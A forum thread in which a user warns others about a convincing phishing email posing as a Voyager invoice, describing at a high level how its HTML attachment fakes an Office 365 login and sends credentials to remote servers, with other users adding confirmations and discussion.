amanzi

#295894 2-May-2022 22:53
I received my monthly invoice from Voyager today (this was a legitimate email) and then a few hours later I received another invoice from Voyager which looked like a genuine email with my correct name, but an incorrect account number and the monthly fee was too high. The invoice attachment with the email was an HTML file, so I downloaded it, opened in VS Code, and found a bunch of encoded HTML inside a JavaScript script tag. After decoding the HTML, I could clearly see the scam contents which appeared to present an Office 365 logon screen but POSTs the credentials to a PHP script hosted on a Digital Ocean IP address. The logon screen looks and feels like a genuine Office 365 logon prompt, pasted below for your reference. 

 

Thought I'd report it here in case other Voyager customers see this and get tricked into trying to open the attachment. Here's a copy of the scam email, I've blanked out the account number because I assume it's a real account number that belongs to another customer. If you're a Voyager customer, you'll recognise this email instantly - looks pretty legit. This is one of the most convincing email scams I've received, and it wasn't picked up by any of the M365 email protections. In fact, on further digging I can see that the SPF checks in the email headers all passed because the email was sent by another M365 customer, whose email must have been hacked.

 

 

 

 

The logon screen that's presented - this appears after the animation you see when opening Outlook.

 

 

 

danfaulknor
Prodigi

  #2909528 2-May-2022 23:40
Quite well done, unfortunately.

 

It's up on their status page too - https://status.voyager.nz/




richms
  #2909529 2-May-2022 23:44
Aww I missed out on this one. Perhaps they skipped over gmail addresses since that would be weird to get microsoft login fakes.




Richard

amanzi

  #2909530 2-May-2022 23:46
danfaulknor:

 

It's up on their status page too - https://status.voyager.nz/

 

 

Thanks for pointing that out. I reported it to them around 10pm, so it looks like they had already received some reports by then.



amanzi

  #2909532 2-May-2022 23:50
richms:

 

Aww I missed out on this one.

 

 

This has been a fun one to dig in to. I've since found two other IP addresses embedded in the code, one of which was also BASE64 encoded. All 3 IP addresses belong to Digital Ocean which I've reported to them, and all of them host some kind of PHP file which only responds to POST requests. This is actually a fairly sophisticated phishing attack and would be really easy to be fooled by.

xpd

xpd
Trash bandit
  #2909551 3-May-2022 08:14
We've had this hit work as well....  and we have nothing held by Vocus/Voyager etc

 

 




       Gavin / xpd / FastRaccoon

 

Website - Photo Gallery - Instagram

 

 

01EG
  #2909677 3-May-2022 15:13
amanzi:

 

I received my monthly invoice from Voyager today.....

 

 

And what is a "from email"?

 

Original one comes from "billing@voyager.nz", hard to miss.

amanzi

  #2909691 3-May-2022 15:45
01EG:

 

amanzi:

 

I received my monthly invoice from Voyager today.....

 

 

And what is a "from email"?

 

Original one comes from "billing@voyager.nz", hard to miss.

 

 

From address was spoofed too: "From: Voyager Accounts <billing@voyager.nz>"

 

 

